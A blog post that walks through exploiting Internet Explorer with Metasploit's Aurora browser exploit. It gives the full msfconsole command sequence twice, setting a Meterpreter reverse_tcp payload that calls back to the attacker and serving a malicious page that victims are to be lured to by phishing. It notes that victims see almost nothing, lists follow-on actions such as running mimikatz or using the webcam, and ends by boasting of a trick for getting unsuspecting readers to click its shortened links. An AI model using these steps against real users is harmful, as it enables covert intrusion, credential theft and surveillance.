Tailored Cyber Security.

The Basics of Browser Exploitation

Saying that something is insecure doesn’t cut it for me and it shouldn’t for you. I said that Internet Explorer is something to avoid in my post “The Basics of Web Browser Security” but I never REALLY got into why. You can google around for a minute or two and find out why but I’ll run you through a quick demo to show you how easy it is to exploit someone’s computer if they use Internet Explorer. Before starting, I do have to add a caveat that this is a client side exploit. In other words, the victim would have to travel to the malicious web page we’ll create. That can be done through phishing or several other tactics that I may or may not discuss in future posts.

Exploiting Internet Explorer from start to finish:
Solid walkthrough: http://tinyurl.com/ls3p6ey

TL;DR
1. Kali Linux
2. Metasploit
  msfconsole
  use exploit/windows/browser/ms10_002_aurora
  set PAYLOAD windows/meterpreter/reverse_tcp
  set URIPATH /exploit.html
  set LHOST <YOUR IP>
  set LPORT 80
  exploit
3. Victim accesses <YOUR IP>/exploit.html
4. Meterpreter prompt = WIN!

First, the easiest way to rock is to download a copy of the ever-popular Linux hacking distro Kali. This has everything you need set up on it already. For a setup tutorial go here (http://tinyurl.com/ns9ujxl).

Next, you’ll need to pop open Metasploit’s console interface (unless you feel l337 then go with msfcli). Following these commands:

  msfconsole
  use exploit/windows/browser/ms10_002_aurora
  set PAYLOAD windows/meterpreter/reverse_tcp
  set URIPATH /exploit.html
  set LHOST <YOUR IP>
  set LPORT 80
  exploit
 
That will start a malicious server that hosts only exploit.html on your computer! We’re utilizing a favorite of mine, the aurora exploit. If you are so inclined you can check out the code here (http://tinyurl.com/kleamnk). Essentially, the only thing this page will do is send some data to the connecting victim. That data will exploit a vulnerability in the coding of Internet Explorer and upload the meterpreter payload. Once that happens you’ll have a command line prompt to do anything ranging from uploading mimikatz to snapping pictures from a connected webcam… google meterpreter if you must.

The goal is to get the victim to unknowingly or accidentally travel to that site. We’ll get into that part another time. But what happens when a victim accesses a malicious site like this one we have? By the way it’s an extravagantly blank page.

On the victim’s side, they will see very little to nothing if executed properly. At most, they will see a little lag in page load time on a blank page. Depending on how you got them to travel there they may get their originally requested page and continue browsing like nothing happened. However, you already know what happens on your side!

P.S. I utilized a method to get clicks from unsuspecting users right here in this post!

Leave a Reply